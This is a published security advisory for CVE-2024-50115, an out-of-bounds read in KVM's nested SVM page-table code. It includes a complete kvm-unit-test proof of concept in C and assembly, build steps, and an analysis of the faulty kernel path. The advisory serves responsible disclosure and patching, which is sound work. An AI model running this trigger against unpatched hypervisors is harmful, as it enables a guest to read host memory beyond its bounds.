Skip to content

KVM: Out-Of-Bounds Read in nested_svm_get_tpd_pdptr

Moderate
rcorrea35 published GHSA-h65x-r3mq-jr2v Dec 9, 2024

Package

KVM (Linux)

Affected versions

> 3.2

Patched versions

5.15.170, 6.1.115, 6.6.59, 6.11.6, 6.12-RC5

Description

Summary

A Out-Of-Bounds (OOB) read affecting KVM since v3.10 was discovered in arch/x86/kvm/svm/nested.c. The memory read is from the user-space process managing the associated KVM based Virtual Machine (VM). The values passed from nested_svm_get_tdp_pdptr are not masked to prevent the access from crossing a page boundary and __kvm_read_guest_page lacks similar validation.

Severity

Moderate - The nested_svm_get_tdp_pdptr function allows a guest Virtual Machine Monitor (VMM) to read memory OOB from its guest physical address (GPA) space. The data read is used to construct Nested Page Tables (NPT) and could be used to indirectly leak memory in the host virtual address (HVA) space.

QEMU was used to develop the PoC and results in __copy_from_user returning an error and __kvm_read_guest_page returning -EFAULT. This is because QEMU adds a guard page directly before and after each region. Other products utilizing KVM could have different outcomes.

Proof-of-Concept

A kvm-unit-test was developed to create a 32-bit protected mode nested-VMM with PAE enabled. It uses existing code from the project and switches a nested-VMM from 64-bit long mode to the require system state and back after executing the VMRUN instruction. This setup triggers the nested_svm_get_tdp_pdptr execution path in KVM.

Modifying the vmcb->control.nested_cr3 value to a GPA at the edge of any memory slot will cause the OOB read access to take place. There are multiple locations that meet this criteria but change based on attached virtual devices and amount of memory.

Testing with QEMU resulted in a return value of -EFAULT because it places guard pages at the start and end of every memory region exposed to the VM. Other applications leveraging KVM could have different results.

Build and Run with kvm-unit-test

  1. Copy svm_p32pae_ncr3.c and _svm_p32pae_ncr3.S to the x86 directory
  2. Update Makefile.x86_64 in the x86 directory to include the contents from the snippet below
  3. Run QEMU with qemu-system-x86_64 -cpu host -m size=2048 -serial stdio -kernel svm_p32pae_ncr3.flat
// Makefile.x86_64
...
# add this line right before the "include $(SRCDIR)/$(TEST_DIR)/Makefile.common" line
tests += $(TEST_DIR)/svm_p32pae_ncr3.$(exe)
...
# add this line to the end of the file
$(TEST_DIR)/svm_p32pae_ncr3.$(bin): $(TEST_DIR)/svm_p32pae_ncr3.o $(TEST_DIR)/_svm_p32pae_ncr3.o
// svm_p32pae_ncr3.c

#include "x86/fwcfg.h"
#include "x86/msr.h"
#include "x86/processor.h"
#include "alloc_page.h"
#include "desc.h"
#include "vmalloc.h"
#include "x86/asm/page.h"
#include "alloc_phys.h"

#define SVM_EXIT_VMMCALL 0x081
#define SVM_EXIT_SHUTDOWN 0x07f
#define SVM_EXIT_NPF 0x400

#define MSR_BITMAP_SIZE 8192

#define TLB_CONTROL_FLUSH_ALL_ASID 1

#define SVM_SELECTOR_S_SHIFT 4
#define SVM_SELECTOR_P_SHIFT 7
#define SVM_SELECTOR_DB_SHIFT 10
#define SVM_SELECTOR_G_SHIFT 11

#define SVM_SELECTOR_S_MASK (1 << SVM_SELECTOR_S_SHIFT)
#define SVM_SELECTOR_P_MASK (1 << SVM_SELECTOR_P_SHIFT)
#define SVM_SELECTOR_DB_MASK (1 << SVM_SELECTOR_DB_SHIFT)
#define SVM_SELECTOR_G_MASK (1 << SVM_SELECTOR_G_SHIFT)

enum {
  INTERCEPT_INTR,
  INTERCEPT_NMI,
  INTERCEPT_SMI,
  INTERCEPT_INIT,
  INTERCEPT_VINTR,
  INTERCEPT_SELECTIVE_CR0,
  INTERCEPT_STORE_IDTR,
  INTERCEPT_STORE_GDTR,
  INTERCEPT_STORE_LDTR,
  INTERCEPT_STORE_TR,
  INTERCEPT_LOAD_IDTR,
  INTERCEPT_LOAD_GDTR,
  INTERCEPT_LOAD_LDTR,
  INTERCEPT_LOAD_TR,
  INTERCEPT_RDTSC,
  INTERCEPT_RDPMC,
  INTERCEPT_PUSHF,
  INTERCEPT_POPF,
  INTERCEPT_CPUID,
  INTERCEPT_RSM,
  INTERCEPT_IRET,
  INTERCEPT_INTn,
  INTERCEPT_INVD,
  INTERCEPT_PAUSE,
  INTERCEPT_HLT,
  INTERCEPT_INVLPG,
  INTERCEPT_INVLPGA,
  INTERCEPT_IOIO_PROT,
  INTERCEPT_MSR_PROT,
  INTERCEPT_TASK_SWITCH,
  INTERCEPT_FERR_FREEZE,
  INTERCEPT_SHUTDOWN,
  INTERCEPT_VMRUN,
  INTERCEPT_VMMCALL,
  INTERCEPT_VMLOAD,
  INTERCEPT_VMSAVE,
  INTERCEPT_STGI,
  INTERCEPT_CLGI,
  INTERCEPT_SKINIT,
  INTERCEPT_RDTSCP,
  INTERCEPT_ICEBP,
  INTERCEPT_WBINVD,
  INTERCEPT_MONITOR,
  INTERCEPT_MWAIT,
  INTERCEPT_MWAIT_COND,
};

struct __attribute__((__packed__)) vmcb_seg {
  u16 selector;
  u16 attrib;
  u32 limit;
  u64 base;
};

struct __attribute__((__packed__)) vmcb_control_area {
  u16 intercept_cr_read;
  u16 intercept_cr_write;
  u16 intercept_dr_read;
  u16 intercept_dr_write;
  u32 intercept_exceptions;
  u64 intercept;
  u8 reserved_1[42];
  u16 pause_filter_count;
  u64 iopm_base_pa;
  u64 msrpm_base_pa;
  u64 tsc_offset;
  u32 asid;
  u8 tlb_ctl;
  u8 reserved_2[3];
  u32 int_ctl;
  u32 int_vector;
  u32 int_state;
  u8 reserved_3[4];
  u32 exit_code;
  u32 exit_code_hi;
  u64 exit_info_1;
  u64 exit_info_2;
  u32 exit_int_info;
  u32 exit_int_info_err;
  u64 nested_ctl;
  u8 reserved_4[16];
  u32 event_inj;
  u32 event_inj_err;
  u64 nested_cr3;
  u64 lbr_ctl;
  u32 clean;
  u32 reserved_5;
  u64 next_rip;
  u8 insn_len;
  u8 insn_bytes[15];
  u8 reserved_6[800];
};

struct __attribute__((__packed__)) vmcb_save_area {
  struct vmcb_seg es;
  struct vmcb_seg cs;
  struct vmcb_seg ss;
  struct vmcb_seg ds;
  struct vmcb_seg fs;
  struct vmcb_seg gs;
  struct vmcb_seg gdtr;
  struct vmcb_seg ldtr;
  struct vmcb_seg idtr;
  struct vmcb_seg tr;
  u8 reserved_1[43];
  u8 cpl;
  u8 reserved_2[4];
  u64 efer;
  u8 reserved_3[112];
  u64 cr4;
  u64 cr3;
  u64 cr0;
  u64 dr7;
  u64 dr6;
  u64 rflags;
  u64 rip;
  u8 reserved_4[88];
  u64 rsp;
  u8 reserved_5[24];
  u64 rax;
  u64 star;
  u64 lstar;
  u64 cstar;
  u64 sfmask;
  u64 kernel_gs_base;
  u64 sysenter_cs;
  u64 sysenter_esp;
  u64 sysenter_eip;
  u64 cr2;
  u8 reserved_6[32];
  u64 g_pat;
  u64 dbgctl;
  u64 br_from;
  u64 br_to;
  u64 last_excp_from;
  u64 last_excp_to;
};

struct __attribute__((__packed__)) vmcb {
  struct vmcb_control_area control;
  struct vmcb_save_area save;
};

struct regs {
  u64 rax;
  u64 rbx;
  u64 rcx;
  u64 rdx;
  u64 cr2;
  u64 rbp;
  u64 rsi;
  u64 rdi;
  u64 r8;
  u64 r9;
  u64 r10;
  u64 r11;
  u64 r12;
  u64 r13;
  u64 r14;
  u64 r15;
  u64 rflags;
};

void svm_p32pae_ncr3_vm_main(void);
void svm_p32pae_ncr3_run_test(void);

struct regs regs;
struct vmcb *vmcb;
void *hsave;

u64 *pte[2048];
u64 *pde[4];
u64 *pdpe;

u8 *io_bitmap;
u8 io_bitmap_area[16384];

u8 *msr_bitmap;
u8 msr_bitmap_area[MSR_BITMAP_SIZE + PAGE_SIZE];

static void vmcb_set_seg(struct vmcb_seg *seg, u16 selector, u64 base,
                         u32 limit, u32 attr) {
  seg->selector = selector;
  seg->attrib = attr;
  seg->limit = limit;
  seg->base = base;
}

static void svm_p32pae_setup(void) {
  struct vmcb_save_area *save = &vmcb->save;
  struct vmcb_control_area *ctrl = &vmcb->control;
  u64 *page, address;
  struct descriptor_table_ptr desc_table_ptr;
  int i, j;

  printf("svm_p32pae_setup\n");

  wrmsr(MSR_VM_HSAVE_PA, (u64)hsave);
  wrmsr(MSR_EFER, rdmsr(MSR_EFER) | EFER_SVME);

  io_bitmap = (void *)ALIGN((ulong)io_bitmap_area, PAGE_SIZE);

  msr_bitmap = (void *)ALIGN((ulong)msr_bitmap_area, PAGE_SIZE);

  u32 data_seg_attr = 3 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_P_MASK |
                      SVM_SELECTOR_DB_MASK | SVM_SELECTOR_G_MASK;
  u32 code_seg_attr = 9 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_DB_MASK |
                      SVM_SELECTOR_P_MASK | SVM_SELECTOR_G_MASK;

  memset(vmcb, 0, sizeof(*vmcb));
  asm volatile("vmsave %0" : : "a"(vmcb) : "memory");

  // setup ec, cs, ds, and ss segments for protected mode
  vmcb_set_seg(&save->es, KERNEL_DS32, 0, -1U, data_seg_attr);
  vmcb_set_seg(&save->cs, KERNEL_CS32, 0, -1U, code_seg_attr);
  vmcb_set_seg(&save->ds, KERNEL_DS32, 0, -1U, data_seg_attr);
  vmcb_set_seg(&save->ss, KERNEL_DS32, 0, -1U, data_seg_attr);

  sgdt(&desc_table_ptr);
  vmcb_set_seg(&save->gdtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);

  sidt(&desc_table_ptr);
  vmcb_set_seg(&save->idtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);

  ctrl->asid = 1;

  save->cpl = 0;
  save->efer = rdmsr(MSR_EFER) &
               ~(_EFER_LME | _EFER_LMA);  // disable long mode in the guest
  save->cr4 = read_cr4();
  save->cr0 = read_cr0() & ~X86_CR0_PG; // disable paging in the guest
  save->dr7 = read_dr7();
  save->dr6 = read_dr6();
  save->cr2 = read_cr2();
  save->g_pat = rdmsr(MSR_IA32_CR_PAT);
  save->dbgctl = rdmsr(MSR_IA32_DEBUGCTLMSR);
  ctrl->intercept = (1ULL << INTERCEPT_VMRUN) | (1ULL << INTERCEPT_VMMCALL);
  ctrl->iopm_base_pa = (u64)io_bitmap;
  ctrl->msrpm_base_pa = (u64)msr_bitmap;

  address = 0;

  /* PTE level */
  for (i = 0; i < 2048; ++i) {
    page = alloc_page();

    for (j = 0; j < 512; ++j, address += 4096) page[j] = address | 0x067ULL;

    pte[i] = page;
  }

  /* PDE level */
  for (i = 0; i < 4; ++i) {
    page = alloc_page();

    for (j = 0; j < 512; ++j) page[j] = (u64)pte[(i * 512) + j] | 0x027ULL;

    pde[i] = page;
  }

  /* PDPE level */
  pdpe = alloc_page();
  for (i = 0; i < 4; ++i) pdpe[i] = ((u64)(pde[i])) | 0x01ULL;

  save->cr3 = (u64)pdpe;

  ctrl->nested_ctl = 1;
  ctrl->nested_cr3 = (u64)pdpe;
  ctrl->tlb_ctl = TLB_CONTROL_FLUSH_ALL_ASID;

  // clear the exit code and info fields
  vmcb->control.exit_code = 0;
  vmcb->control.exit_info_1 = 0;
  vmcb->control.exit_info_2 = 0;
}

int main(int argc, char *argv[]) {
  void *stack;
  pteval_t opt_mask = 0;
  
  printf("VM Started...\n");

  __setup_vm(&opt_mask);

  if (!this_cpu_has(X86_FEATURE_SVM)) {
    printf("SVM not availble\n");
    exit(-1);
  }

  if (!this_cpu_has(X86_FEATURE_NPT)) {
    printf("NPT not availble\n");
    exit(-1);
  }

  vmcb = alloc_page();
  hsave = alloc_page();

  svm_p32pae_setup();

  stack = alloc_page();
  vmcb->save.rsp = ((ulong)stack) + PAGE_SIZE;
  vmcb->save.rip = (ulong)&svm_p32pae_ncr3_vm_main;
  vmcb->save.rax = ~0ULL;

  printf("svm_p32pae_ncr3_vm_main @ %p\n", &svm_p32pae_ncr3_vm_main);

  // use the nested_cr3 page tables for the vmm page tables
  // after the switch to protected mode
  regs.rsi = vmcb->control.nested_cr3;

  // set nested_cr3 to a gpa that would be at a boundary
  // this value was obtained by running `info mtree` from the monitor cli
  vmcb->control.nested_cr3 = 0x3fffffff;
  
  svm_p32pae_ncr3_run_test();

  printf("guest rip: 0x%lx\n", vmcb->save.rip);
  printf("guest rax: 0x%lx\n", vmcb->save.rax);

  switch (vmcb->control.exit_code) {
    case SVM_EXIT_VMMCALL:
      printf("exit_code == SVM_EXIT_VMMCALL\n");
      break;
    default:
      printf("exit_code == %x\n", vmcb->control.exit_code);
      break;
  }

  printf("VM Stopped...\n");

  exit(0);
}
// _svm_p32pae_ncr3.S

.extern regs
.extern vmcb

xchg_gprs:
  xchg %rbx, regs+0x8
  xchg %rcx, regs+0x10
  xchg %rdx, regs+0x18
  xchg %rbp, regs+0x28
  xchg %rsi, regs+0x30
  xchg %rdi, regs+0x38
  xchg %r8, regs+0x40
  xchg %r9, regs+0x48
  xchg %r10, regs+0x50
  xchg %r11, regs+0x58
  xchg %r12, regs+0x60
  xchg %r13, regs+0x68
  xchg %r14, regs+0x70
  xchg %r15, regs+0x78
  ret

switch_to_protected_pae_mode:
  ljmp *1f
1:
.long 2f
.long 0x20 // KERNEL_CS32
.code32 // switch to 32-bit code
2:

  push %eax
  push %ecx
        push %edx

        movl %cr0, %eax
        btcl  $31, %eax /* clear PG */
        movl %eax, %cr0

  movl $0xc0000080, %ecx
  rdmsr
  btcl $8, %eax /* clear LME */
  wrmsr

  movl %cr3, %eax
        movl %esi, %cr3 // restore cr3 from guest esi
  movl %eax, %esi

  movl %cr0, %eax
        btsl  $31, %eax /* set PG */
        movl %eax, %cr0

  ljmpl $0x20, $1f
1:

  pop %edx
  pop %ecx
  pop %eax

  ret
.code64 // restore 64-bit code mode

switch_to_long_mode:
.code32 //switch to 32-bit code
  push %eax
  push %ecx
  push %edx

  movl %cr0, %eax
  btcl  $31, %eax /* clear PG */
  movl %eax, %cr0

  movl %cr3, %eax
        movl %esi, %cr3 // restore cr3 from guest esi
  movl %eax, %esi

  movl $0xc0000080, %ecx
  rdmsr
  btsl $8, %eax /* set LME */
  wrmsr

  movl %cr0, %eax
  btsl  $31, %eax /* set PG */
  movl %eax, %cr0

  pop %edx // this isn't correct per the amd manual
  pop %ecx // but i guess the vm is okay with a few pops
  pop %eax // before the switch to long mode
  ljmp *1f
1:
.long 2f
.long 0x08 //KERNEL_CS64
.code64 // make this 64-bit code
2:
  ret

.global svm_p32pae_ncr3_run_test
svm_p32pae_ncr3_run_test:
        
  call xchg_gprs

  call switch_to_protected_pae_mode
.code32

  mov vmcb, %eax
  vmload %eax

  vmrun %eax
  //.byte 0xeb, 0xfe
  
  mov vmcb, %eax
  vmsave %eax

  call switch_to_long_mode
.code64

  call xchg_gprs

  ret


.global svm_p32pae_ncr3_vm_main
svm_p32pae_ncr3_vm_main:
.code32
  mov $0x42424242, %eax
  vmmcall

Further Analysis

A guest VMM leveraging AMD’s Secure Virtual Machine (SVM) extensions with NPT enabled could be used to access memory outside of its GPA space by specifying an unaligned NPT Control Register 3 (CR3) value in its Virtual Machine Control Block (VMCB). From protected mode with Physical Address Extension (PAE) enabled a guest VMM can set NP_ENABLE and populate the N_CR3 field in the VMCB with an unaligned GPA. In this configuration CR3 points to a Page Directory Pointer Table (PDPT) with 4 entries that are 8 bytes each. The VMCB is processed by KVM when the VMRUN instruction is executed by the guest VMM.

KVM uses a function pointer in the kvm_mmu structure named get_pdptr to load a PDPT register. When a nested-VMM has SVM_NESTED_CTL_NP_ENABLE in nested_ctl that function pointer is set to nested_svm_get_tpd_pdptr.

When nested_svm_tpd_pdptr is called the nested_cr3 value in the svm->nested.ctl structure contains the guest VMM controlled GPA of the PDPT and is loaded into the local u64 cr3 variable. It's then used to get the gfn_t gfn with gpa_to_gfn(cr3) and int offset with offset_in_page(cr3) + index * 8. These values are passed to kvm_vcpu_read_guest_page.

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/kvm_host.h

static inline gfn_t gpa_to_gfn(gpa_t gpa)
{
        return (gfn_t)(gpa >> PAGE_SHIFT);
}
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/mm.h

#define offset_in_page(p)       ((unsigned long)(p) & ~PAGE_MASK)
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kvm/svm/nested.c

static u64 nested_svm_get_tdp_pdptr(struct kvm_vcpu *vcpu, int index)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        u64 cr3 = svm->nested.ctl.nested_cr3;
        u64 pdpte;
        int ret;

        ret = kvm_vcpu_read_guest_page(vcpu, gpa_to_gfn(cr3), &pdpte,
                                       offset_in_page(cr3) + index * 8, 8);
        if (ret)
                return 0;
        return pdpte;
}

kvm_vcpu_read_guest_page uses the gfn_t gfn to get the kvm_memory_slot *slot and calls __kvm_read_guest_page. __kvm_read_guest_page uses the gft_t gfn passed to get a HVA using gfn_to_hva_memslot_prot and then calls __copy_from_user with address + offset.

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/virt/kvm/kvm_main.c

int kvm_vcpu_read_guest_page(struct kvm_vcpu *vcpu, gfn_t gfn, void *data,
                             int offset, int len)
{
        struct kvm_memory_slot *slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);

        return __kvm_read_guest_page(vcpu->kvm, slot, gfn, data, offset, len);
}

static int __kvm_read_guest_page(struct kvm_memory_slot *slot, gfn_t gfn,
                                 void *data, int offset, int len)
{
        int r;
        unsigned long addr;

        addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
        if (kvm_is_error_hva(addr))
                return -EFAULT;
        r = __copy_from_user(data, (void __user *)addr + offset, len);
        if (r)
                return -EFAULT;
        return 0;
}

CR3 in protected mode with PAE enabled only needs to be 32-byte aligned and KVM does not perform any alignment checking on the nested_cr3 value it can be set to any address in the GPA space.

It should be noted that "Volume 2: System Programming" of the "AMD64 Architecture Programmer’s Manual" does not identify any bits for the N_CR3 field as RESERVED, SBZ or otherwise in "Appendix B VMCB Layout" as it does for other fields in Table B-1. Section 15.25.4 does describe nCR3 as, "the version of CR3 to be used while the nested-paging guest is running", and then states "Any MBZ bit of nCR3 is set" as an illegal state combination. Lastly, Figure 3-5 describes CR3 in "Legacy-Mode PAE Paging" as only using bits 31:5 for the address.

For example, if a guest VMM set N_CR3 in the VMCB to the last page of a memory slot with an offset of 0xfff and executed VMRUN the following would occur:

  1. nested_svm_get_tdp_pdptr would be called and use N_CR3 controlled by the guest VMM to compute the gfn and offset passed to kvm_vcpu_read_guest_page
  2. gpa_to_gfn(cr3) would pass the gfn associated with the nested_cr3 value
  3. offset_in_page(cr3) + index * 8 would pass 0xfff, 0x1007, 0x100f, 0x1017 based on index which can be 0 through 3
  4. kvm_vcpu_read_guest_page gets the slot for the nested_cr3 gfn and calls __kvm_read_guest_page
  5. __kvm_read_guest_page calls gfn_to_hva_memslot_prot to get the HVA and checks it with kvm_is_error_hva
  6. __copy_from_user is called after adding addr + offset which results in a read across the page boundary and outside of the memory slot previously checked
  7. If this read succeeded the value returned would be used by KVM as a pdptr and if it failed would return -EFAULT

nested_cr3 could be checked to ensure that it is 32-byte aligned but this bug identifies a larger issue with the underlying __kvm_read_guest_page function. Specifically, if this function is meant to operate on a single page, as the name implies, it needs to ensure the entire access is within page bounds.

The addition of nested virtualization presents an indirect interface from a VM to KVM, through the VMCB for AMD CPUs, that wasn't wasn't previously controllable by a VM. Existing code that was updated to support this functionality needs should be reviewed further to esnure inputs are properly validated.

Timeline

Date reported: 08/27/2024
Date fixed: 11/05/2024
Date disclosed: 12/09/2024

Severity

Moderate

CVE ID

CVE-2024-50115

Weaknesses

No CWEs

Credits